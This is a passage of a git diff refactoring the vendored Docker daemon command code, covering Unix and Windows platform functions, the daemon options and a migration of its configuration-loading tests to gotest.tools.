-// setupConfigReloadTrap configures the USR2 signal to reload the configuration.
-func (cli *DaemonCli) setupConfigReloadTrap() {
-}
-
-// notifySystem sends a message to the host when the server is ready to be used
-func notifySystem() {
-}
-
-func (cli *DaemonCli) getPlatformRemoteOptions() []libcontainerd.RemoteOption {
-	opts := []libcontainerd.RemoteOption{}
-	if cli.Config.ContainerdAddr != "" {
-		opts = append(opts, libcontainerd.WithRemoteAddr(cli.Config.ContainerdAddr))
-	} else {
-		opts = append(opts, libcontainerd.WithStartDaemon(true))
-	}
-	return opts
-}
-
-// getLibcontainerdRoot gets the root directory for libcontainerd/containerd to
-// store their state.
-func (cli *DaemonCli) getLibcontainerdRoot() string {
-	return filepath.Join(cli.Config.ExecRoot, "libcontainerd")
-}
-
-// getSwarmRunRoot gets the root directory for swarm to store runtime state
-// For example, the control socket
-func (cli *DaemonCli) getSwarmRunRoot() string {
-	return filepath.Join(cli.Config.ExecRoot, "swarm")
-}
-
-func allocateDaemonPort(addr string) error {
-	return nil
-}
-
-// notifyShutdown is called after the daemon shuts down but before the process exits.
-func notifyShutdown(err error) {
-}
-
-func wrapListeners(proto string, ls []net.Listener) []net.Listener {
-	return ls
-}
diff --git a/vendor/github.com/docker/docker/cmd/dockerd/daemon_test.go b/vendor/github.com/docker/docker/cmd/dockerd/daemon_test.go
index b364f87843..ad447e3b90 100644
--- a/vendor/github.com/docker/docker/cmd/dockerd/daemon_test.go
+++ b/vendor/github.com/docker/docker/cmd/dockerd/daemon_test.go
@@ -3,34 +3,31 @@ package main
 import (
 	"testing"
 
-	"github.com/Sirupsen/logrus"
-	cliflags "github.com/docker/docker/cli/flags"
-	"github.com/docker/docker/daemon"
-	"github.com/docker/docker/pkg/testutil/assert"
-	"github.com/docker/docker/pkg/testutil/tempfile"
+	"github.com/docker/docker/daemon/config"
+	"github.com/sirupsen/logrus"
 	"github.com/spf13/pflag"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+	"gotest.tools/fs"
 )
 
-func defaultOptions(configFile string) daemonOptions {
-	opts := daemonOptions{
-		daemonConfig: &daemon.Config{},
-		flags:        &pflag.FlagSet{},
-		common:       cliflags.NewCommonOptions(),
-	}
-	opts.common.InstallFlags(opts.flags)
-	opts.daemonConfig.InstallFlags(opts.flags)
-	opts.flags.StringVar(&opts.configFile, flagDaemonConfigFile, defaultDaemonConfigFile, "")
+func defaultOptions(configFile string) *daemonOptions {
+	opts := newDaemonOptions(&config.Config{})
+	opts.flags = &pflag.FlagSet{}
+	opts.InstallFlags(opts.flags)
+	installConfigFlags(opts.daemonConfig, opts.flags)
+	opts.flags.StringVar(&opts.configFile, "config-file", defaultDaemonConfigFile, "")
 	opts.configFile = configFile
 	return opts
 }
 
 func TestLoadDaemonCliConfigWithoutOverriding(t *testing.T) {
 	opts := defaultOptions("")
-	opts.common.Debug = true
+	opts.Debug = true
 
 	loadedConfig, err := loadDaemonCliConfig(opts)
 	assert.NilError(t, err)
-	assert.NotNil(t, loadedConfig)
+	assert.Assert(t, loadedConfig != nil)
 	if !loadedConfig.Debug {
 		t.Fatalf("expected debug to be copied from the common flags, got false")
 	}
@@ -38,108 +35,148 @@ func TestLoadDaemonCliConfigWithoutOverriding(t *testing.T) {
 
 func TestLoadDaemonCliConfigWithTLS(t *testing.T) {
 	opts := defaultOptions("")
-	opts.common.TLSOptions.CAFile = "/tmp/ca.pem"
-	opts.common.TLS = true
+	opts.TLSOptions.CAFile = "/tmp/ca.pem"
+	opts.TLS = true
 
 	loadedConfig, err := loadDaemonCliConfig(opts)
 	assert.NilError(t, err)
-	assert.NotNil(t, loadedConfig)
-	assert.Equal(t, loadedConfig.CommonTLSOptions.CAFile, "/tmp/ca.pem")
+	assert.Assert(t, loadedConfig != nil)
+	assert.Check(t, is.Equal("/tmp/ca.pem", loadedConfig.CommonTLSOptions.CAFile))
 }
 
 func TestLoadDaemonCliConfigWithConflicts(t *testing.T) {
-	tempFile := tempfile.NewTempFile(t, "config", `{"labels": ["l3=foo"]}`)
+	tempFile := fs.NewFile(t, "config", fs.WithContent(`{"labels": ["l3=foo"]}`))
+	defer tempFile.Remove()
+	configFile := tempFile.Path()
+
+	opts := defaultOptions(configFile)
+	flags := opts.flags
+
+	assert.Check(t, flags.Set("config-file", configFile))
+	assert.Check(t, flags.Set("label", "l1=bar"))
+	assert.Check(t, flags.Set("label", "l2=baz"))
+
+	_, err := loadDaemonCliConfig(opts)
+	assert.Check(t, is.ErrorContains(err, "as a flag and in the configuration file: labels"))
+}
+
+func TestLoadDaemonCliWithConflictingNodeGenericResources(t *testing.T) {
+	tempFile := fs.NewFile(t, "config", fs.WithContent(`{"node-generic-resources": ["foo=bar", "bar=baz"]}`))
 	defer tempFile.Remove()
-	configFile := tempFile.Name()
+	configFile := tempFile.Path()
 
 	opts := defaultOptions(configFile)
 	flags := opts.flags
 
-	assert.NilError(t, flags.Set(flagDaemonConfigFile, configFile))
-	assert.NilError(t, flags.Set("label", "l1=bar"))
-	assert.NilError(t, flags.Set("label", "l2=baz"))
+	assert.Check(t, flags.Set("config-file", configFile))
+	assert.Check(t, flags.Set("node-generic-resource", "r1=bar"))
+	assert.Check(t, flags.Set("node-generic-resource", "r2=baz"))
+
+	_, err := loadDaemonCliConfig(opts)
+	assert.Check(t, is.ErrorContains(err, "as a flag and in the configuration file: node-generic-resources"))
+}
+
+func TestLoadDaemonCliWithConflictingLabels(t *testing.T) {
+	opts := defaultOptions("")
+	flags := opts.flags
+
+	assert.Check(t, flags.Set("label", "foo=bar"))
+	assert.Check(t, flags.Set("label", "foo=baz"))
+
+	_, err := loadDaemonCliConfig(opts)
+	assert.Check(t, is.Error(err, "conflict labels for foo=baz and foo=bar"))
+}
+
+func TestLoadDaemonCliWithDuplicateLabels(t *testing.T) {
+	opts := defaultOptions("")
+	flags := opts.flags
+
+	assert.Check(t, flags.Set("label", "foo=the-same"))
+	assert.Check(t, flags.Set("label", "foo=the-same"))
 
 	_, err := loadDaemonCliConfig(opts)
-	assert.Error(t, err, "as a flag and in the configuration file: labels")
+	assert.Check(t, err)
 }
 
 func TestLoadDaemonCliConfigWithTLSVerify(t *testing.T) {
-	tempFile := tempfile.NewTempFile(t, "config", `{"tlsverify": true}`)
+	tempFile := fs.NewFile(t, "config", fs.WithContent(`{"tlsverify": true}`))
 	defer tempFile.Remove()
 
-	opts := defaultOptions(tempFile.Name())
-	opts.common.TLSOptions.CAFile = "/tmp/ca.pem"
+	opts := defaultOptions(tempFile.Path())
+	opts.TLSOptions.CAFile = "/tmp/ca.pem"
 
 	loadedConfig, err := loadDaemonCliConfig(opts)
 	assert.NilError(t, err)
-	assert.NotNil(t, loadedConfig)
-	assert.Equal(t, loadedConfig.TLS, true)
+	assert.Assert(t, loadedConfig != nil)
+	assert.Check(t, is.Equal(loadedConfig.TLS, true))
 }
 
 func TestLoadDaemonCliConfigWithExplicitTLSVerifyFalse(t *testing.T) {
-	tempFile := tempfile.NewTempFile(t, "config", `{"tlsverify": false}`)
+	tempFile := fs.NewFile(t, "config", fs.WithContent(`{"tlsverify": false}`))
 	defer tempFile.Remove()
 
-	opts := defaultOptions(tempFile.Name())
-	opts.common.TLSOptions.CAFile = "/tmp/ca.pem"
+	opts := defaultOptions(tempFile.Path())
+	opts.TLSOptions.CAFile = "/tmp/ca.pem"
 
 	loadedConfig, err := loadDaemonCliConfig(opts)
 	assert.NilError(t, err)
-	assert.NotNil(t, loadedConfig)
-	assert.Equal(t, loadedConfig.TLS, true)
+	assert.Assert(t, loadedConfig != nil)
+	assert.Check(t, loadedConfig.TLS)
 }
 
 func TestLoadDaemonCliConfigWithoutTLSVerify(t *testing.T) {
-	tempFile := tempfile.NewTempFile(t, "config", `{}`)
+	tempFile := fs.NewFile(t, "config", fs.WithContent(`{}`))
 	defer tempFile.Remove()
 
-	opts := defaultOptions(tempFile.Name())
-	opts.common.TLSOptions.CAFile = "/tmp/ca.pem"
+	opts := defaultOptions(tempFile.Path())
+	opts.TLSOptions.CAFile = "/tmp/ca.pem"
 
 	loadedConfig, err := loadDaemonCliConfig(opts)
 	assert.NilError(t, err)
-	assert.NotNil(t, loadedConfig)
-	assert.Equal(t, loadedConfig.TLS, false)
+	assert.Assert(t, loadedConfig != nil)
+	assert.Check(t, !loadedConfig.TLS)
 }
 
 func TestLoadDaemonCliConfigWithLogLevel(t *testing.T) {
-	tempFile := tempfile.NewTempFile(t, "config", `{"log-level": "warn"}`)
+	tempFile := fs.NewFile(t, "config", fs.WithContent(`{"log-level": "warn"}`))
 	defer tempFile.Remove()
 
-	opts := defaultOptions(tempFile.Name())
+	opts := defaultOptions(tempFile.Path())
 	loadedConfig, err := loadDaemonCliConfig(opts)
 	assert.NilError(t, err)
-	assert.NotNil(t, loadedConfig)
-	assert.Equal(t, loadedConfig.LogLevel, "warn")
-	assert.Equal(t, logrus.GetLevel(), logrus.WarnLevel)
+	assert.Assert(t, loadedConfig != nil)
+	assert.Check(t, is.Equal("warn", loadedConfig.LogLevel))
+	assert.Check(t, is.Equal(logrus.WarnLevel, logrus.GetLevel()))
 }
 
 func TestLoadDaemonConfigWithEmbeddedOptions(t *testing.T) {
 	content := `{"tlscacert": "/etc/certs/ca.pem", "log-driver": "syslog"}`
-	tempFile := tempfile.NewTempFile(t, "config", content)
+	tempFile := fs.NewFile(t, "config", fs.WithContent(content))
 	defer tempFile.Remove()
 
-	opts := defaultOptions(tempFile.Name())
+	opts := defaultOptions(tempFile.Path())
 	loadedConfig, err := loadDaemonCliConfig(opts)
 	assert.NilError(t, err)
-	assert.NotNil(t, loadedConfig)
-	assert.Equal(t, loadedConfig.CommonTLSOptions.CAFile, "/etc/certs/ca.pem")
-	assert.Equal(t, loadedConfig.LogConfig.Type, "syslog")
+	assert.Assert(t, loadedConfig != nil)
+	assert.Check(t, is.Equal("/etc/certs/ca.pem", loadedConfig.CommonTLSOptions.CAFile))
+	assert.Check(t, is.Equal("syslog", loadedConfig.LogConfig.Type))
 }
 
 func TestLoadDaemonConfigWithRegistryOptions(t *testing.T) {
 	content := `{
+		"allow-nondistributable-artifacts": ["allow-nondistributable-artifacts.com"],
 		"registry-mirrors": ["https://mirrors.docker.com"],
 		"insecure-registries": ["https://insecure.docker.com"]
 	}`
-	tempFile := tempfile.NewTempFile(t, "config", content)
+	tempFile := fs.NewFile(t, "config", fs.WithContent(content))
 	defer tempFile.Remove()
 
-	opts := defaultOptions(tempFile.Name())
+	opts := defaultOptions(tempFile.Path())
 	loadedConfig, err := loadDaemonCliConfig(opts)
 	assert.NilError(t, err)
-	assert.NotNil(t, loadedConfig)
+	assert.Assert(t, loadedConfig != nil)
 
-	assert.Equal(t, len(loadedConfig.Mirrors), 1)
-	assert.Equal(t, len(loadedConfig.InsecureRegistries), 1)
+	assert.Check(t, is.Len(loadedConfig.AllowNondistributableArtifacts, 1))
+	assert.Check(t, is.Len(loadedConfig.Mirrors, 1))
+	assert.Check(t, is.Len(loadedConfig.InsecureRegistries, 1))
 }
diff --git a/vendor/github.com/docker/docker/cmd/dockerd/daemon_unix.go b/vendor/github.com/docker/docker/cmd/dockerd/daemon_unix.go
index bdce98bd26..2561baa774 100644
--- a/vendor/github.com/docker/docker/cmd/dockerd/daemon_unix.go
+++ b/vendor/github.com/docker/docker/cmd/dockerd/daemon_unix.go
@@ -1,4 +1,4 @@
-// +build !windows,!solaris
+// +build !windows
 
 package main
 
@@ -9,34 +9,23 @@ import (
 	"os/signal"
 	"path/filepath"
 	"strconv"
-	"syscall"
 
+	"github.com/containerd/containerd/runtime/linux"
 	"github.com/docker/docker/cmd/dockerd/hack"
 	"github.com/docker/docker/daemon"
 	"github.com/docker/docker/libcontainerd"
-	"github.com/docker/docker/pkg/system"
 	"github.com/docker/libnetwork/portallocator"
+	"golang.org/x/sys/unix"
 )
 
 const defaultDaemonConfigFile = "/etc/docker/daemon.json"
 
-// currentUserIsOwner checks whether the current user is the owner of the given
-// file.
-func currentUserIsOwner(f string) bool {
-	if fileInfo, err := system.Stat(f); err == nil && fileInfo != nil {
-		if int(fileInfo.UID()) == os.Getuid() {
-			return true
-		}
-	}
-	return false
-}
-
 // setDefaultUmask sets the umask to 0022 to avoid problems
 // caused by custom umask
 func setDefaultUmask() error {
 	desiredUmask := 0022
-	syscall.Umask(desiredUmask)
-	if umask := syscall.Umask(desiredUmask); umask != desiredUmask {
+	unix.Umask(desiredUmask)
+	if umask := unix.Umask(desiredUmask); umask != desiredUmask {
 		return fmt.Errorf("failed to set umask: expected %#o, got %#o", desiredUmask, umask)
 	}
 
@@ -47,42 +36,37 @@ func getDaemonConfDir(_ string) string {
 	return "/etc/docker"
 }
 
-// setupConfigReloadTrap configures the USR2 signal to reload the configuration.
-func (cli *DaemonCli) setupConfigReloadTrap() {
-	c := make(chan os.Signal, 1)
-	signal.Notify(c, syscall.SIGHUP)
-	go func() {
-		for range c {
-			cli.reloadConfig()
-		}
-	}()
-}
-
-func (cli *DaemonCli) getPlatformRemoteOptions() []libcontainerd.RemoteOption {
+func (cli *DaemonCli) getPlatformRemoteOptions() ([]libcontainerd.RemoteOption, error) {
 	opts := []libcontainerd.RemoteOption{
-		libcontainerd.WithDebugLog(cli.Config.Debug),
 		libcontainerd.WithOOMScore(cli.Config.OOMScoreAdjust),
+		libcontainerd.WithPlugin("linux", &linux.Config{
+			Shim:        daemon.DefaultShimBinary,
+			Runtime:     daemon.DefaultRuntimeBinary,
+			RuntimeRoot: filepath.Join(cli.Config.Root, "runc"),
+			ShimDebug:   cli.Config.Debug,
+		}),
+	}
+	if cli.Config.Debug {
+		opts = append(opts, libcontainerd.WithLogLevel("debug"))
 	}
 	if cli.Config.ContainerdAddr != "" {
 		opts = append(opts, libcontainerd.WithRemoteAddr(cli.Config.ContainerdAddr))
 	} else {
 		opts = append(opts, libcontainerd.WithStartDaemon(true))
 	}
-	if daemon.UsingSystemd(cli.Config) {
-		args := []string{"--systemd-cgroup=true"}
-		opts = append(opts, libcontainerd.WithRuntimeArgs(args))
-	}
-	if cli.Config.LiveRestoreEnabled {
-		opts = append(opts, libcontainerd.WithLiveRestore(true))
-	}
-	opts = append(opts, libcontainerd.WithRuntimePath(daemon.DefaultRuntimeBinary))
-	return opts
+
+	return opts, nil
 }
 
-// getLibcontainerdRoot gets the root directory for libcontainerd/containerd to
-// store their state.
-func (cli *DaemonCli) getLibcontainerdRoot() string {
-	return filepath.Join(cli.Config.ExecRoot, "libcontainerd")
+// setupConfigReloadTrap configures the USR2 signal to reload the configuration.
+func (cli *DaemonCli) setupConfigReloadTrap() {
+	c := make(chan os.Signal, 1)
+	signal.Notify(c, unix.SIGHUP)
+	go func() {
+		for range c {
+			cli.reloadConfig()
+		}
+	}()
 }
 
 // getSwarmRunRoot gets the root directory for swarm to store runtime state
@@ -120,17 +104,13 @@ func allocateDaemonPort(addr string) error {
 	return nil
 }
 
-// notifyShutdown is called after the daemon shuts down but before the process exits.
-func notifyShutdown(err error) {
-}
-
 func wrapListeners(proto string, ls []net.Listener) []net.Listener {
 	switch proto {
 	case "unix":
-		ls[0] = &hack.MalformedHostHeaderOverride{ls[0]}
+		ls[0] = &hack.MalformedHostHeaderOverride{Listener: ls[0]}
 	case "fd":
 		for i := range ls {
-			ls[i] = &hack.MalformedHostHeaderOverride{ls[i]}
+			ls[i] = &hack.MalformedHostHeaderOverride{Listener: ls[i]}
 		}
 	}
 	return ls
diff --git a/vendor/github.com/docker/docker/cmd/dockerd/daemon_unix_test.go b/vendor/github.com/docker/docker/cmd/dockerd/daemon_unix_test.go
index d66dba77e1..692d0328c4 100644
--- a/vendor/github.com/docker/docker/cmd/dockerd/daemon_unix_test.go
+++ b/vendor/github.com/docker/docker/cmd/dockerd/daemon_unix_test.go
@@ -1,50 +1,49 @@
-// +build !windows,!solaris
-
-// TODO: Create new file for Solaris which tests config parameters
-// as described in daemon/config_solaris.go
+// +build !windows
 
 package main
 
 import (
-	"github.com/docker/docker/daemon"
-	"github.com/docker/docker/pkg/testutil/assert"
-	"github.com/docker/docker/pkg/testutil/tempfile"
 	"testing"
+
+	"github.com/docker/docker/daemon/config"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+	"gotest.tools/fs"
 )
 
 func TestLoadDaemonCliConfigWithDaemonFlags(t *testing.T) {
 	content := `{"log-opts": {"max-size": "1k"}}`
-	tempFile := tempfile.NewTempFile(t, "config", content)
+	tempFile := fs.NewFile(t, "config", fs.WithContent(content))
 	defer tempFile.Remove()
 
-	opts := defaultOptions(tempFile.Name())
-	opts.common.Debug = true
-	opts.common.LogLevel = "info"
-	assert.NilError(t, opts.flags.Set("selinux-enabled", "true"))
+	opts := defaultOptions(tempFile.Path())
+	opts.Debug = true
+	opts.LogLevel = "info"
+	assert.Check(t, opts.flags.Set("selinux-enabled", "true"))
 
 	loadedConfig, err := loadDaemonCliConfig(opts)
 	assert.NilError(t, err)
-	assert.NotNil(t, loadedConfig)
+	assert.Assert(t, loadedConfig != nil)
 
-	assert.Equal(t, loadedConfig.Debug, true)
-	assert.Equal(t, loadedConfig.LogLevel, "info")
-	assert.Equal(t, loadedConfig.EnableSelinuxSupport, true)
-	assert.Equal(t, loadedConfig.LogConfig.Type, "json-file")
-	assert.Equal(t, loadedConfig.LogConfig.Config["max-size"], "1k")
+	assert.Check(t, loadedConfig.Debug)
+	assert.Check(t, is.Equal("info", loadedConfig.LogLevel))
+	assert.Check(t, loadedConfig.EnableSelinuxSupport)
+	assert.Check(t, is.Equal("json-file", loadedConfig.LogConfig.Type))
+	assert.Check(t, is.Equal("1k", loadedConfig.LogConfig.Config["max-size"]))
 }
 
 func TestLoadDaemonConfigWithNetwork(t *testing.T) {
 	content := `{"bip": "127.0.0.2", "ip": "127.0.0.1"}`
-	tempFile := tempfile.NewTempFile(t, "config", content)
+	tempFile := fs.NewFile(t, "config", fs.WithContent(content))
 	defer tempFile.Remove()
 
-	opts := defaultOptions(tempFile.Name())
+	opts := defaultOptions(tempFile.Path())
 	loadedConfig, err := loadDaemonCliConfig(opts)
 	assert.NilError(t, err)
-	assert.NotNil(t, loadedConfig)
+	assert.Assert(t, loadedConfig != nil)
 
-	assert.Equal(t, loadedConfig.IP, "127.0.0.2")
-	assert.Equal(t, loadedConfig.DefaultIP.String(), "127.0.0.1")
+	assert.Check(t, is.Equal("127.0.0.2", loadedConfig.IP))
+	assert.Check(t, is.Equal("127.0.0.1", loadedConfig.DefaultIP.String()))
 }
 
 func TestLoadDaemonConfigWithMapOptions(t *testing.T) {
@@ -52,63 +51,49 @@ func TestLoadDaemonConfigWithMapOptions(t *testing.T) {
 		"cluster-store-opts": {"kv.cacertfile": "/var/lib/docker/discovery_certs/ca.pem"},
 		"log-opts": {"tag": "test"}
 }`
-	tempFile := tempfile.NewTempFile(t, "config", content)
+	tempFile := fs.NewFile(t, "config", fs.WithContent(content))
 	defer tempFile.Remove()
 
-	opts := defaultOptions(tempFile.Name())
+	opts := defaultOptions(tempFile.Path())
 	loadedConfig, err := loadDaemonCliConfig(opts)
 	assert.NilError(t, err)
-	assert.NotNil(t, loadedConfig)
-	assert.NotNil(t, loadedConfig.ClusterOpts)
+	assert.Assert(t, loadedConfig != nil)
+	assert.Check(t, loadedConfig.ClusterOpts != nil)
 
 	expectedPath := "/var/lib/docker/discovery_certs/ca.pem"
-	assert.Equal(t, loadedConfig.ClusterOpts["kv.cacertfile"], expectedPath)
-	assert.NotNil(t, loadedConfig.LogConfig.Config)
-	assert.Equal(t, loadedConfig.LogConfig.Config["tag"], "test")
+	assert.Check(t, is.Equal(expectedPath, loadedConfig.ClusterOpts["kv.cacertfile"]))
+	assert.Check(t, loadedConfig.LogConfig.Config != nil)
+	assert.Check(t, is.Equal("test", loadedConfig.LogConfig.Config["tag"]))
 }
 
 func TestLoadDaemonConfigWithTrueDefaultValues(t *testing.T) {
 	content := `{ "userland-proxy": false }`
-	tempFile := tempfile.NewTempFile(t, "config", content)
+	tempFile := fs.NewFile(t, "config", fs.WithContent(content))
 	defer tempFile.Remove()
 
-	opts := defaultOptions(tempFile.Name())
+	opts := defaultOptions(tempFile.Path())
 	loadedConfig, err := loadDaemonCliConfig(opts)
 	assert.NilError(t, err)
-	assert.NotNil(t, loadedConfig)
-	assert.NotNil(t, loadedConfig.ClusterOpts)
+	assert.Assert(t, loadedConfig != nil)
 
-	assert.Equal(t, loadedConfig.EnableUserlandProxy, false)
+	assert.Check(t, !loadedConfig.EnableUserlandProxy)
 
 	// make sure reloading doesn't generate configuration
 	// conflicts after normalizing boolean values.
-	reload := func(reloadedConfig *daemon.Config) {
-		assert.Equal(t, reloadedConfig.EnableUserlandProxy, false)
+	reload := func(reloadedConfig *config.Config) {
+		assert.Check(t, !reloadedConfig.EnableUserlandProxy)
 	}
-	assert.NilError(t, daemon.ReloadConfiguration(opts.configFile, opts.flags, reload))
+	assert.Check(t, config.Reload(opts.configFile, opts.flags, reload))
 }
 
 func TestLoadDaemonConfigWithTrueDefaultValuesLeaveDefaults(t *testing.T) {
-	tempFile := tempfile.NewTempFile(t, "config", `{}`)
+	tempFile := fs.NewFile(t, "config", fs.WithContent(`{}`))
 	defer tempFile.Remove()
 
-	opts := defaultOptions(tempFile.Name())
+	opts := defaultOptions(tempFile.Path())
 	loadedConfig, err := loadDaemonCliConfig(opts)
 	assert.NilError(t, err)
-	assert.NotNil(t, loadedConfig)
-	assert.NotNil(t, loadedConfig.ClusterOpts)
-
-	assert.Equal(t, loadedConfig.EnableUserlandProxy, true)
-}
+	assert.Assert(t, loadedConfig != nil)
 
-func TestLoadDaemonConfigWithLegacyRegistryOptions(t *testing.T) {
-	content := `{"disable-legacy-registry": true}`
-	tempFile := tempfile.NewTempFile(t, "config", content)
-	defer tempFile.Remove()
-
-	opts := defaultOptions(tempFile.Name())
-	loadedConfig, err := loadDaemonCliConfig(opts)
-	assert.NilError(t, err)
-	assert.NotNil(t, loadedConfig)
-	assert.Equal(t, loadedConfig.V2Only, true)
+	assert.Check(t, loadedConfig.EnableUserlandProxy)
 }
diff --git a/vendor/github.com/docker/docker/cmd/dockerd/daemon_windows.go b/vendor/github.com/docker/docker/cmd/dockerd/daemon_windows.go
index 4cccd32688..224c509455 100644
--- a/vendor/github.com/docker/docker/cmd/dockerd/daemon_windows.go
+++ b/vendor/github.com/docker/docker/cmd/dockerd/daemon_windows.go
@@ -5,21 +5,14 @@ import (
 	"net"
 	"os"
 	"path/filepath"
-	"syscall"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/docker/libcontainerd"
-	"github.com/docker/docker/pkg/system"
+	"github.com/sirupsen/logrus"
+	"golang.org/x/sys/windows"
 )
 
 var defaultDaemonConfigFile = ""
 
-// currentUserIsOwner checks whether the current user is the owner of the given
-// file.
-func currentUserIsOwner(f string) bool {
-	return false
-}
-
 // setDefaultUmask doesn't do anything on windows
 func setDefaultUmask() error {
 	return nil
@@ -29,8 +22,10 @@ func getDaemonConfDir(root string) string {
 	return filepath.Join(root, `\config`)
 }
 
-// notifySystem sends a message to the host when the server is ready to be used
-func notifySystem() {
+// preNotifySystem sends a message to the host when the API is active, but before the daemon is
+func preNotifySystem() {
+	// start the service now to prevent timeouts waiting for daemon to start
+	// but still (eventually) complete all requests that are sent after this
 	if service != nil {
 		err := service.started()
 		if err != nil {
@@ -39,6 +34,10 @@ func notifySystem() {
 	}
 }
 
+// notifySystem sends a message to the host when the server is ready to be used
+func notifySystem() {
+}
+
 // notifyShutdown is called after the daemon shuts down but before the process exits.
 func notifyShutdown(err error) {
 	if service != nil {
@@ -49,34 +48,28 @@ func notifyShutdown(err error) {
 	}
 }
 
+func (cli *DaemonCli) getPlatformRemoteOptions() ([]libcontainerd.RemoteOption, error) {
+	return nil, nil
+}
+
 // setupConfigReloadTrap configures a Win32 event to reload the configuration.
 func (cli *DaemonCli) setupConfigReloadTrap() {
 	go func() {
-		sa := syscall.SecurityAttributes{
+		sa := windows.SecurityAttributes{
 			Length: 0,
 		}
-		ev := "Global\\docker-daemon-config-" + fmt.Sprint(os.Getpid())
-		if h, _ := system.CreateEvent(&sa, false, false, ev); h != 0 {
-			logrus.Debugf("Config reload - waiting signal at %s", ev)
+		event := "Global\\docker-daemon-config-" + fmt.Sprint(os.Getpid())
+		ev, _ := windows.UTF16PtrFromString(event)
+		if h, _ := windows.CreateEvent(&sa, 0, 0, ev); h != 0 {
+			logrus.Debugf("Config reload - waiting signal at %s", event)
 			for {
-				syscall.WaitForSingleObject(h, syscall.INFINITE)
+				windows.WaitForSingleObject(h, windows.INFINITE)
 				cli.reloadConfig()
 			}
 		}
 	}()
 }
 
-func (cli *DaemonCli) getPlatformRemoteOptions() []libcontainerd.RemoteOption {
-	return nil
-}
-
-// getLibcontainerdRoot gets the root directory for libcontainerd to store its
-// state. The Windows libcontainerd implementation does not need to write a spec
-// or state to disk, so this is a no-op.
-func (cli *DaemonCli) getLibcontainerdRoot() string {
-	return ""
-}
-
 // getSwarmRunRoot gets the root directory for swarm to store runtime state
 // For example, the control socket
 func (cli *DaemonCli) getSwarmRunRoot() string {
diff --git a/vendor/github.com/docker/docker/cmd/dockerd/docker.go b/vendor/github.com/docker/docker/cmd/dockerd/docker.go
index 60742ae927..463482e938 100644
--- a/vendor/github.com/docker/docker/cmd/dockerd/docker.go
+++ b/vendor/github.com/docker/docker/cmd/dockerd/docker.go
@@ -3,33 +3,19 @@ package main
 import (
 	"fmt"
 	"os"
-	"path/filepath"
 	"runtime"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/docker/cli"
-	cliflags "github.com/docker/docker/cli/flags"
-	"github.com/docker/docker/daemon"
+	"github.com/docker/docker/daemon/config"
 	"github.com/docker/docker/dockerversion"
 	"github.com/docker/docker/pkg/reexec"
 	"github.com/docker/docker/pkg/term"
+	"github.com/sirupsen/logrus"
 	"github.com/spf13/cobra"
-	"github.com/spf13/pflag"
 )
 
-type daemonOptions struct {
-	version      bool
-	configFile   string
-	daemonConfig *daemon.Config
-	common       *cliflags.CommonOptions
-	flags        *pflag.FlagSet
-}
-
 func newDaemonCommand() *cobra.Command {
-	opts := daemonOptions{
-		daemonConfig: daemon.NewConfig(),
-		common:       cliflags.NewCommonOptions(),
-	}
+	opts := newDaemonOptions(config.New())
 
 	cmd := &cobra.Command{
 		Use:           "dockerd [OPTIONS]",
@@ -41,57 +27,21 @@ func newDaemonCommand() *cobra.Command {
 			opts.flags = cmd.Flags()
 			return runDaemon(opts)
 		},
+		DisableFlagsInUseLine: true,
+		Version:               fmt.Sprintf("%s, build %s", dockerversion.Version, dockerversion.GitCommit),
 	}
 	cli.SetupRootCommand(cmd)
 
 	flags := cmd.Flags()
-	flags.BoolVarP(&opts.version, "version", "v", false, "Print version information and quit")
-	flags.StringVar(&opts.configFile, flagDaemonConfigFile, defaultDaemonConfigFile, "Daemon configuration file")
-	opts.common.InstallFlags(flags)
-	opts.daemonConfig.InstallFlags(flags)
+	flags.BoolP("version", "v", false, "Print version information and quit")
+	flags.StringVar(&opts.configFile, "config-file", defaultDaemonConfigFile, "Daemon configuration file")
+	opts.InstallFlags(flags)
+	installConfigFlags(opts.daemonConfig, flags)
 	installServiceFlags(flags)
 
 	return cmd
 }
 
-func runDaemon(opts daemonOptions) error {
-	if opts.version {
-		showVersion()
-		return nil
-	}
-
-	daemonCli := NewDaemonCli()
-
-	// Windows specific settings as these are not defaulted.
-	if runtime.GOOS == "windows" {
-		if opts.daemonConfig.Pidfile == "" {
-			opts.daemonConfig.Pidfile = filepath.Join(opts.daemonConfig.Root, "docker.pid")
-		}
-		if opts.configFile == "" {
-			opts.configFile = filepath.Join(opts.daemonConfig.Root, `config\daemon.json`)
-		}
-	}
-
-	// On Windows, this may be launching as a service or with an option to
-	// register the service.
-	stop, err := initService(daemonCli)
-	if err != nil {
-		logrus.Fatal(err)
-	}
-
-	if stop {
-		return nil
-	}
-
-	err = daemonCli.start(opts)
-	notifyShutdown(err)
-	return err
-}
-
-func showVersion() {
-	fmt.Printf("Docker version %s, build %s\n", dockerversion.Version, dockerversion.GitCommit)
-}
-
 func main() {
 	if reexec.Init() {
 		return
@@ -99,7 +49,14 @@ func main() {
 
 	// Set terminal emulation based on platform as required.
 	_, stdout, stderr := term.StdStreams()
-	logrus.SetOutput(stderr)
+
+	// @jhowardmsft - maybe there is a historic reason why on non-Windows, stderr is used
+	// here. However, on Windows it makes no sense and there is no need.
+	if runtime.GOOS == "windows" {
+		logrus.SetOutput(stdout)
+	} else {
+		logrus.SetOutput(stderr)
+	}
 
 	cmd := newDaemonCommand()
 	cmd.SetOutput(stdout)
diff --git a/vendor/github.com/docker/docker/cmd/dockerd/docker_unix.go b/vendor/github.com/docker/docker/cmd/dockerd/docker_unix.go
new file mode 100644
index 0000000000..0dec48663d
--- /dev/null
+++ b/vendor/github.com/docker/docker/cmd/dockerd/docker_unix.go
@@ -0,0 +1,8 @@
+// +build !windows
+
+package main
+
+func runDaemon(opts *daemonOptions) error {
+	daemonCli := NewDaemonCli()
+	return daemonCli.start(opts)
+}
diff --git a/vendor/github.com/docker/docker/cmd/dockerd/docker_windows.go b/vendor/github.com/docker/docker/cmd/dockerd/docker_windows.go
index 19c5587cb6..bd8bc5a58e 100644
--- a/vendor/github.com/docker/docker/cmd/dockerd/docker_windows.go
+++ b/vendor/github.com/docker/docker/cmd/dockerd/docker_windows.go
@@ -1,18 +1,38 @@
 package main
 
 import (
-	"sync/atomic"
+	"path/filepath"
 
 	_ "github.com/docker/docker/autogen/winresources/dockerd"
+	"github.com/sirupsen/logrus"
 )
 
-//go:cgo_import_dynamic main.dummy CommandLineToArgvW%2 "shell32.dll"
+func runDaemon(opts *daemonOptions) error {
+	daemonCli := NewDaemonCli()
 
-var dummy uintptr
